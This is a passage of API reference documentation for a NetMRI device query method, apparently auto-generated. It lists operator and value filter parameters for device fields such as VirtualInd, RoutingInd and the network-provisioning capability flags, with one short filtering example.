| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterProvisionData: If op_FilterProvisionData is specified, the field named in this input will be compared to the value in FilterProvisionData using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterProvisionData must be specified if op_FilterProvisionData is specified.
:type val_f_FilterProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterProvisionData: If op_FilterProvisionData is specified, this value will be compared to the value in FilterProvisionData using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterProvisionData must be specified if op_FilterProvisionData is specified.
:type val_c_FilterProvisionData: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilteringInd: The operator to apply to the field FilteringInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilteringInd: A flag indicating whether this device is eligible for Security Device Controller. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilteringInd: If op_FilteringInd is specified, the field named in this input will be compared to the value in FilteringInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilteringInd must be specified if op_FilteringInd is specified.
:type val_f_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilteringInd: If op_FilteringInd is specified, this value will be compared to the value in FilteringInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilteringInd must be specified if op_FilteringInd is specified.
:type val_c_FilteringInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceChangedCols: The operator to apply to the field InfraDeviceChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceChangedCols: If op_InfraDeviceChangedCols is specified, the field named in this input will be compared to the value in InfraDeviceChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceChangedCols must be specified if op_InfraDeviceChangedCols is specified.
:type val_f_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceChangedCols: If op_InfraDeviceChangedCols is specified, this value will be compared to the value in InfraDeviceChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceChangedCols must be specified if op_InfraDeviceChangedCols is specified.
:type val_c_InfraDeviceChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceEndTime: The operator to apply to the field InfraDeviceEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceEndTime: If op_InfraDeviceEndTime is specified, the field named in this input will be compared to the value in InfraDeviceEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceEndTime must be specified if op_InfraDeviceEndTime is specified.
:type val_f_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceEndTime: If op_InfraDeviceEndTime is specified, this value will be compared to the value in InfraDeviceEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceEndTime must be specified if op_InfraDeviceEndTime is specified.
:type val_c_InfraDeviceEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceStartTime: The operator to apply to the field InfraDeviceStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceStartTime: The starting effective time of this revision of the record. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceStartTime: If op_InfraDeviceStartTime is specified, the field named in this input will be compared to the value in InfraDeviceStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceStartTime must be specified if op_InfraDeviceStartTime is specified.
:type val_f_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceStartTime: If op_InfraDeviceStartTime is specified, this value will be compared to the value in InfraDeviceStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceStartTime must be specified if op_InfraDeviceStartTime is specified.
:type val_c_InfraDeviceStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InfraDeviceTimestamp: The operator to apply to the field InfraDeviceTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InfraDeviceTimestamp: The date and time this record was collected. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InfraDeviceTimestamp: If op_InfraDeviceTimestamp is specified, the field named in this input will be compared to the value in InfraDeviceTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InfraDeviceTimestamp must be specified if op_InfraDeviceTimestamp is specified.
:type val_f_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InfraDeviceTimestamp: If op_InfraDeviceTimestamp is specified, this value will be compared to the value in InfraDeviceTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InfraDeviceTimestamp must be specified if op_InfraDeviceTimestamp is specified.
:type val_c_InfraDeviceTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_MgmtServerDeviceID: The operator to apply to the field MgmtServerDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. MgmtServerDeviceID: The Device ID of the management server for the device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_MgmtServerDeviceID: If op_MgmtServerDeviceID is specified, the field named in this input will be compared to the value in MgmtServerDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_MgmtServerDeviceID must be specified if op_MgmtServerDeviceID is specified.
:type val_f_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_MgmtServerDeviceID: If op_MgmtServerDeviceID is specified, this value will be compared to the value in MgmtServerDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_MgmtServerDeviceID must be specified if op_MgmtServerDeviceID is specified.
:type val_c_MgmtServerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NetworkDeviceInd: The operator to apply to the field NetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NetworkDeviceInd: A flag indicating whether this device is a network device or an end host. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NetworkDeviceInd: If op_NetworkDeviceInd is specified, the field named in this input will be compared to the value in NetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_f_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NetworkDeviceInd: If op_NetworkDeviceInd is specified, this value will be compared to the value in NetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_c_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ParentDeviceID: The operator to apply to the field ParentDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ParentDeviceID: If op_ParentDeviceID is specified, the field named in this input will be compared to the value in ParentDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ParentDeviceID must be specified if op_ParentDeviceID is specified.
:type val_f_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ParentDeviceID: If op_ParentDeviceID is specified, this value will be compared to the value in ParentDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ParentDeviceID must be specified if op_ParentDeviceID is specified.
:type val_c_ParentDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RoutingInd: The operator to apply to the field RoutingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RoutingInd: If op_RoutingInd is specified, the field named in this input will be compared to the value in RoutingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RoutingInd must be specified if op_RoutingInd is specified.
:type val_f_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RoutingInd: If op_RoutingInd is specified, this value will be compared to the value in RoutingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RoutingInd must be specified if op_RoutingInd is specified.
:type val_c_RoutingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SwitchingInd: The operator to apply to the field SwitchingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SwitchingInd: If op_SwitchingInd is specified, the field named in this input will be compared to the value in SwitchingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SwitchingInd must be specified if op_SwitchingInd is specified.
:type val_f_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SwitchingInd: If op_SwitchingInd is specified, this value will be compared to the value in SwitchingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SwitchingInd must be specified if op_SwitchingInd is specified.
:type val_c_SwitchingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VirtualInd: The operator to apply to the field VirtualInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualInd: A flag indicating whether the source device is a virtual device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values. See the flag-filter sketch following this field's value entries below.
:type op_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualInd: If op_VirtualInd is specified, the field named in this input will be compared to the value in VirtualInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualInd must be specified if op_VirtualInd is specified.
:type val_f_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualInd: If op_VirtualInd is specified, this value will be compared to the value in VirtualInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualInd must be specified if op_VirtualInd is specified.
:type val_c_VirtualInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
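A sketch of filtering on a flag field such as VirtualInd, again reusing the ``broker`` from the first sketch (the constant is illustrative)::

    # Keep only non-virtual (physical) devices.
    physical_only = broker.find(op_VirtualInd="=", val_c_VirtualInd="0")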
:param op_VirtualNetworkID: The operator to apply to the field VirtualNetworkID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualNetworkID: If op_VirtualNetworkID is specified, the field named in this input will be compared to the value in VirtualNetworkID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualNetworkID must be specified if op_VirtualNetworkID is specified.
:type val_f_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualNetworkID: If op_VirtualNetworkID is specified, this value will be compared to the value in VirtualNetworkID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualNetworkID must be specified if op_VirtualNetworkID is specified.
:type val_c_VirtualNetworkID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VirtualNetworkingInd: The operator to apply to the field VirtualNetworkingInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VirtualNetworkingInd: Set to null, 0, or 1: 0 indicates this is not a VRF-aware device; 1 indicates it is VRF-aware. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VirtualNetworkingInd: If op_VirtualNetworkingInd is specified, the field named in this input will be compared to the value in VirtualNetworkingInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VirtualNetworkingInd must be specified if op_VirtualNetworkingInd is specified.
:type val_f_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VirtualNetworkingInd: If op_VirtualNetworkingInd is specified, this value will be compared to the value in VirtualNetworkingInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VirtualNetworkingInd must be specified if op_VirtualNetworkingInd is specified.
:type val_c_VirtualNetworkingInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_available_mgmt_ips: The operator to apply to the field available_mgmt_ips. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. available_mgmt_ips: Available Management IPs for a device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_available_mgmt_ips: If op_available_mgmt_ips is specified, the field named in this input will be compared to the value in available_mgmt_ips using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_available_mgmt_ips must be specified if op_available_mgmt_ips is specified.
:type val_f_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_available_mgmt_ips: If op_available_mgmt_ips is specified, this value will be compared to the value in available_mgmt_ips using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_available_mgmt_ips must be specified if op_available_mgmt_ips is specified.
:type val_c_available_mgmt_ips: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_admin_status_ind: The operator to apply to the field cap_admin_status_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_admin_status_ind: Capability of changing the Admin Status of an interface on this device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_admin_status_ind: If op_cap_admin_status_ind is specified, the field named in this input will be compared to the value in cap_admin_status_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_admin_status_ind must be specified if op_cap_admin_status_ind is specified.
:type val_f_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_admin_status_ind: If op_cap_admin_status_ind is specified, this value will be compared to the value in cap_admin_status_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_admin_status_ind must be specified if op_cap_admin_status_ind is specified.
:type val_c_cap_admin_status_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_admin_status_na_reason: The operator to apply to the field cap_admin_status_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_admin_status_na_reason: Reason the Admin Status of an interface of this device cannot be changed. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_admin_status_na_reason: If op_cap_admin_status_na_reason is specified, the field named in this input will be compared to the value in cap_admin_status_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_admin_status_na_reason must be specified if op_cap_admin_status_na_reason is specified.
:type val_f_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_admin_status_na_reason: If op_cap_admin_status_na_reason is specified, this value will be compared to the value in cap_admin_status_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_admin_status_na_reason must be specified if op_cap_admin_status_na_reason is specified.
:type val_c_cap_admin_status_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_description_ind: The operator to apply to the field cap_description_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_description_ind: Capability of changing the description of an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_description_ind: If op_cap_description_ind is specified, the field named in this input will be compared to the value in cap_description_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_description_ind must be specified if op_cap_description_ind is specified.
:type val_f_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_description_ind: If op_cap_description_ind is specified, this value will be compared to the value in cap_description_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_description_ind must be specified if op_cap_description_ind is specified.
:type val_c_cap_description_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_description_na_reason: The operator to apply to the field cap_description_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_description_na_reason: Reason the description of an interface of this device cannot be changed. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_description_na_reason: If op_cap_description_na_reason is specified, the field named in this input will be compared to the value in cap_description_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_description_na_reason must be specified if op_cap_description_na_reason is specified.
:type val_f_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_description_na_reason: If op_cap_description_na_reason is specified, this value will be compared to the value in cap_description_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_description_na_reason must be specified if op_cap_description_na_reason is specified.
:type val_c_cap_description_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_deprovisioning_ind: The operator to apply to the field cap_net_deprovisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_deprovisioning_ind: Capability of de-provisioning a network from this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_deprovisioning_ind: If op_cap_net_deprovisioning_ind is specified, the field named in this input will be compared to the value in cap_net_deprovisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_deprovisioning_ind must be specified if op_cap_net_deprovisioning_ind is specified.
:type val_f_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_deprovisioning_ind: If op_cap_net_deprovisioning_ind is specified, this value will be compared to the value in cap_net_deprovisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_deprovisioning_ind must be specified if op_cap_net_deprovisioning_ind is specified.
:type val_c_cap_net_deprovisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_deprovisioning_na_reason: The operator to apply to the field cap_net_deprovisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_deprovisioning_na_reason: Reason a network cannot be de-provisioned from this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_deprovisioning_na_reason: If op_cap_net_deprovisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_deprovisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_deprovisioning_na_reason must be specified if op_cap_net_deprovisioning_na_reason is specified.
:type val_f_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_deprovisioning_na_reason: If op_cap_net_deprovisioning_na_reason is specified, this value will be compared to the value in cap_net_deprovisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_deprovisioning_na_reason must be specified if op_cap_net_deprovisioning_na_reason is specified.
:type val_c_cap_net_deprovisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_provisioning_ind: The operator to apply to the field cap_net_provisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_provisioning_ind: Capability of provisioning a network on an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_provisioning_ind: If op_cap_net_provisioning_ind is specified, the field named in this input will be compared to the value in cap_net_provisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_provisioning_ind must be specified if op_cap_net_provisioning_ind is specified.
:type val_f_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_provisioning_ind: If op_cap_net_provisioning_ind is specified, this value will be compared to the value in cap_net_provisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_provisioning_ind must be specified if op_cap_net_provisioning_ind is specified.
:type val_c_cap_net_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_provisioning_na_reason: The operator to apply to the field cap_net_provisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_provisioning_na_reason: Reason a network cannot be provisioned on an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_provisioning_na_reason: If op_cap_net_provisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_provisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_provisioning_na_reason must be specified if op_cap_net_provisioning_na_reason is specified.
:type val_f_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_provisioning_na_reason: If op_cap_net_provisioning_na_reason is specified, this value will be compared to the value in cap_net_provisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_provisioning_na_reason must be specified if op_cap_net_provisioning_na_reason is specified.
:type val_c_cap_net_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_vlan_provisioning_ind: The operator to apply to the field cap_net_vlan_provisioning_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_vlan_provisioning_ind: Capability of creating a VLAN and provisioning a network on its virtual interface. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_vlan_provisioning_ind: If op_cap_net_vlan_provisioning_ind is specified, the field named in this input will be compared to the value in cap_net_vlan_provisioning_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_vlan_provisioning_ind must be specified if op_cap_net_vlan_provisioning_ind is specified.
:type val_f_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_vlan_provisioning_ind: If op_cap_net_vlan_provisioning_ind is specified, this value will be compared to the value in cap_net_vlan_provisioning_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_vlan_provisioning_ind must be specified if op_cap_net_vlan_provisioning_ind is specified.
:type val_c_cap_net_vlan_provisioning_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_net_vlan_provisioning_na_reason: The operator to apply to the field cap_net_vlan_provisioning_na_reason. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_net_vlan_provisioning_na_reason: Reason a VLAN cannot be created and a network provisioned on its virtual interface. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_net_vlan_provisioning_na_reason: If op_cap_net_vlan_provisioning_na_reason is specified, the field named in this input will be compared to the value in cap_net_vlan_provisioning_na_reason using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_net_vlan_provisioning_na_reason must be specified if op_cap_net_vlan_provisioning_na_reason is specified.
:type val_f_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_net_vlan_provisioning_na_reason: If op_cap_net_vlan_provisioning_na_reason is specified, this value will be compared to the value in cap_net_vlan_provisioning_na_reason using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_net_vlan_provisioning_na_reason must be specified if op_cap_net_vlan_provisioning_na_reason is specified.
:type val_c_cap_net_vlan_provisioning_na_reason: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_vlan_assignment_ind: The operator to apply to the field cap_vlan_assignment_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_vlan_assignment_ind: Capability of assigning a regular data VLAN to an interface of this device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_cap_vlan_assignment_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
